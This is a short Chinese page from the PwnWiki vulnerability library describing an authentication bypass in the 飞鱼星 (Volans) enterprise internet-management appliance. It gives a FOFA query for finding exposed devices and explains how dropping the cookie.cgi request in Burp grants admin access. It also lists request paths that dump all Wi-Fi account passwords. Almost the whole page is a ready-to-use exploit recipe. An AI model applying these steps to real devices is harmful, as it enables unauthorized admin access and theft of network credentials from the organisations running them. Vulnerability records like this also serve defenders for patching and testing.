Loading
0

飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

FOFA

title="飞鱼星企业级智能上网行为管理系统"

漏洞利用

访问主页使用Burp抓包;

http://xxx.xxx.xxx.xxx/home/index.html

使用Burp Dorp cookie.cgi请求包

成功越权后台,其中还存在敏感信息泄露

/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码

免费、自由、人人可编辑的漏洞库--PwnWiki.com